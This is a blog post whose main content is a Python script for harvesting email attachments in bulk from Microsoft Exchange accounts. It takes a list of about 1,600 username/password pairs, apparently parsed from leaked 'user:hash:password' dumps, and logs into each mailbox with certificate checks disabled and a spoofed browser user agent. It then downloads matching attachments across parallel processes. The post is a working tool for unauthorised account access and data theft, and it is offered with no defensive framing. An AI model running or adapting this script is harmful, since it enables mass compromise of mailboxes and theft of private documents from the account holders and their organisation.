exchange邮件爬虫

#!/usr/bin/python3
# coding=utf8

from __future__ import print_function
import shutil
from exchangelib import Credentials, Account, Configuration, DELEGATE, FileAttachment, EWSDateTime
from multiprocessing.pool import Pool

from exchangelib.protocol import BaseProtocol
from exchangelib.protocol import NoVerifyHTTPAdapter
from urllib3.exceptions import InsecureRequestWarning
import urllib3
import time, os, sys, linecache
urllib3.disable_warnings(InsecureRequestWarning)

URL = ""
MAIL_SERVER = ""
suffix = "" #邮箱尾缀

# Tell exchangelib to use this adapter class instead of the default
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
BaseProtocol.USERAGENT = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"

FILTER = ['admin_meical', 'e_news', 'LanguageCenter', 'rtaf_news', 'weather', "Welfare", "dict1"]
AttachFilter = 'ppt'

TSTART = EWSDateTime(2020, 7, 3)
TEND = EWSDateTime(2022, 7, 3)

if not os.path.isdir("attach"):
    os.mkdir("attach")

pwd_path = os.getcwd()
AttachDir = os.path.join(pwd_path, 'attach')

def R(message):
    return "\033[1;91m{}\033[0;m".format(message)

def G(message):
    return "\033[1;92m{}\033[0;m".format(message)

def Y(message):
    return "\033[1;93m{}\033[0;m".format(message)

def B(message):
    return "\033[1;94m{}\033[0;m".format(message)

def PrintException():
    exc_type, exc_obj, tb = sys.exc_info()
    f = tb.tb_frame
    lineno = tb.tb_lineno
    filename = f.f_code.co_filename
    linecache.checkcache(filename)
    line = linecache.getline(filename, lineno, f.f_globals)
    print(R('EXCEPTION IN (LINE {} "{}"): {}'.format(lineno, line.strip(), exc_obj)))

def getAccount(username, password):
    if not username.endswith(suffix):
        username += "@" + suffix
    credentials = Credentials(username, password)
    config = Configuration(server=MAIL_SERVER, credentials=credentials)
    account = Account(primary_smtp_address=username, config=config,
                      autodiscover=False, access_type=DELEGATE)
    return account

def log(user, text):
    with open(os.path.join(user, "log.txt"), "a", encoding="utf-8") as f:
        f.write(text+"\n")

def getinfo(user, account):
    print(user, "[*]Found {} mails in inbox, {} unread".format(
        account.inbox.total_count, account.inbox.unread_count))
    print("trash", account.trash.total_count)
    print("outbox", account.outbox.total_count)
    print("sent", account.sent.total_count)

def mkuserdir(user):
    if not os.path.isdir(user):
        os.mkdir(user)
    else:
        print(B("[*]Dir %s already exists" % user))

def download_attachments(items, user):
    for item in items:
        try:
            #print("[*]Find message: %s" % (item.message_id))
            pathh = "%s_%s_%s" % (item.sender.email_address.split("@")[0], str(item.datetime_received).split()[0], item.importance)
            pathh = os.path.join(user, pathh)
            if item.has_attachments:
                for attachment in item.attachments:
                    if isinstance(attachment, FileAttachment):
                        if AttachFilter not in attachment.name:
                            continue
                        if not os.path.isdir(pathh):
                            os.mkdir(pathh)
                        if len(attachment.name) > 60:
                            name, ext = attachment.name.rsplit(".",1)
                            attach_name = "{}.{}".format(name[:55], ext)
                        else:
                            attach_name = attachment.name
                        attach_path = os.path.join(pathh, attach_name)
                        with open(attach_path, 'wb') as f, attachment.fp as fp:
                            buffer = fp.read(1024)
                            while buffer:
                                f.write(buffer)
                                buffer = fp.read(1024)
                        shutil.copy(attach_path, AttachDir)
                        log(user, '[+]Attachment saved: ' + attachment.name)
                        print(G("[+]Saved attachment: %s for user: %s" % (attachment.name, user)))
        except Exception as e:
            pass
            #PrintException()

def getinbox(account, user):
    #print(B("[*]Getting attachments in inbox: %s" % user))
    # starting = account.default_timezone.localize(TSTART)
    # end = account.default_timezone.localize(TEND)
    # items = account.inbox.filter(datetime_received__range=(starting, end))
    items = account.inbox.all()
    download_attachments(items, user)
    filtered_items = account.inbox.filter(subject__contains='foo').exclude(categories__icontains='bar')

def gettrash(account, user):
    #print(B("[*]Getting attachments in th trash: %s" % user))
    # starting = account.default_timezone.localize(TSTART)
    # end = account.default_timezone.localize(TEND)
    # items = account.inbox.filter(datetime_received__range=(starting, end))
    items = account.inbox.all()
    download_attachments(items, user)
    return 0

def getoutbox(account, user):
    #print(B("[*]Getting attachments in the outbox: %s" % user))
    # starting = account.default_timezone.localize(TSTART)
    # end = account.default_timezone.localize(TEND)
    # items = account.inbox.filter(datetime_received__range=(starting, end))
    items = account.inbox.all()
    download_attachments(items, user)
    return 0

def getsent(account, user):
    #print(B("[*]Getting attachments in the sent: %s" % user))
    # starting = account.default_timezone.localize(TSTART)
    # end = account.default_timezone.localize(TEND)
    # items = account.inbox.filter(datetime_received__range=(starting, end))
    items = account.inbox.all()
    download_attachments(items, user)
    return 0

def usermail(user, passwd):
    mkuserdir(user)

    tries1 = 0
    while tries1<2:
        try:
            account = getAccount(user, passwd)
            #getinfo(user, account)
            break
        except Exception as e:
            #PrintException()
            tries1 += 1
            time.sleep(20)
    if tries1 == 3:
        return False
    #return True

    tries = 0
    while tries<2:
        try:
            if [].count(user) == 0:
                getinbox(account, user)
            gettrash(account, user)
            getoutbox(account, user)
            getsent(account, user)
            return True
        except Exception as e:
            #PrintException()
            tries += 1
            #print(Y("[*]Sleep 20s and try again"))
            time.sleep(10)
    return False

def account_entry(fp):
    for i in fp:
        user, passwd = i.split()
        #print(Y("==================================Enter Next Account=================================="))
        # if usermail(user, passwd):
        #     print(G("[+]Complete download attachments for %s" % (user)))
        # else:
        #     print(R("[-]Fail download attachments for %s" % (user)))
        usermail(user, passwd)

    #print(B("[*]Getting all attachment"))

if __name__ == '__main__':

    # 分割用户名:哈希:密码,保留用户名和密码
    # with open("ori.txt", 'r', encoding='utf-8') as f:
    #     with open("new.txt", 'a', encoding='utf-8') as fp:
    #         lines = f.readlines()
    #         for line in lines:
    #             [u, h, p] = line.split(":")
    #             line2 = u + ' ' + p
    #             fp.write(line2)

    # 将1600个用户分给20个线程处理,每个线程处理80个用户
    fd = open("new.txt").read().split("\n")
    c = 0
    fd_list = []
    all_list = []
    thread_jobs = 80
    for f in fd:
        c = c + 1
        if c>thread_jobs:
            all_list.append(fd_list)
            fd_list = []
            c = 0
        fd_list.append(f)
    if not fd_list:
        all_list.append(fd_list)

    thread_num = len(all_list)
    print(G("[*]Thread num is: %s" % str(thread_num)))

    pool = Pool(processes=thread_num)
    pool.map(account_entry, all_list)
posted @   z5onk0  阅读(51)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
点击右上角即可分享
微信分享提示